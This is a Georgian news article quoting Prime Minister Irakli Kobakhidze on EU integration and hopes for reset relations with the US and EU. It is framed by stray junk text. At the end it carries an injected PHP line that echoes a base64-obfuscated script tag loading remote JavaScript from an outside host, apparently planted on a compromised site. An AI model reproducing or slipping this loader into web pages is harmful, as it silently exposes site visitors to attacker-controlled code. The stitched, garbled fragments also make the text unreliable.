celsiusi
ავერსი შნაიდერი

ჩვენი მთავარი საგარეო პოლიტიკური პრიორიტეტი არის ევროკავშირში ინტეგრაცია - ძალიან დიდი იმედი გვაქვს, რომ ურთიერთობები როგორც ამერიკის შეერთებულ შტატებთან, ასევე ევროკავშირთან თვისობრივად გადაიტვირთება - საქმე, შანტაჟის ნაცვლად, ეს არის ჩვენი დამოკიდებულება, - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი კობახიძემ მთავრობის სხდომაზე განაცხადა.

მისი თქმით, „ქართულ ოცნებას“ საგარეო პოლიტიკის კუთხით ამბიციური გეგმები აქვს.

„რაც შეეხება საგარეო პოლიტიკას, აქ გვაქვს ამბიციური გეგმები. გვაქვს სერიოზული ამოცანები. ჩვენი მთავარი საგარეო პოლიტიკური პრიორიტეტი არის ევროკავშირში ინტეგრაცია. ჩვენი საარჩევნო პროგრამის თანახმად, 2028 წლისთვის ასოცირების დღის წესრიგით და თავისუფალი ვაჭრობის შეთანხმებით გათვალისწინებული ვალდებულებების 90%-ზე მეტი უნდა გვქონდეს შესრულებული და რა თქმა უნდა, ეს დაპირება პირნათლად შესრულდება. ასევე, გვაქვს ძალიან დიდი იმედი, რომ ურთიერთობები როგორც ამერიკის შეერთებულ შტატებთან, ასევე ევროკავშირთან თვისობრივად გადაიტვირთება. 20 იანვარს დონალდ ტრამპის ინაუგურაცია შედგება, შესაბამისად, აშშ-ის, ევროკავშირს ეყოლება ახალი ლიდერი. ამ ლიდერების პირობებში ვფიქრობთ, ურთიერთობების თვისობრივად გადატვირთვა შესაძლებელია. ყველაფერი უნდა გავაკეთოთ, რათა ურთიერთობები გაჯანსაღდეს. გასული 4 წლის განმავლობაში ამ ურთიერთობებს სერიოზული პრობლემა შეექმნა, რაც ჩვენი ბრალი არ ყოფილა. ხელოვნური დაბრკოლებები იქმნებოდა საქართველოს ევროინტეგრაციის გზაზე. იყო სერიოზული შანტაჟი, უხეში შანტაჟი. საქმე, შანტაჟის ნაცვლად. ეს არის ჩვენი დამოკიდებულება და ამ დამოკიდებულებით აუცილებლად უნდა განვაგრძოთ იმ მიმართულებით, რასაც ჰქვია საქართველოს სრულფასოვანი ინტეგრაცია ევროკავშირში“, - განაცხადა პრემიერმა.

51
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");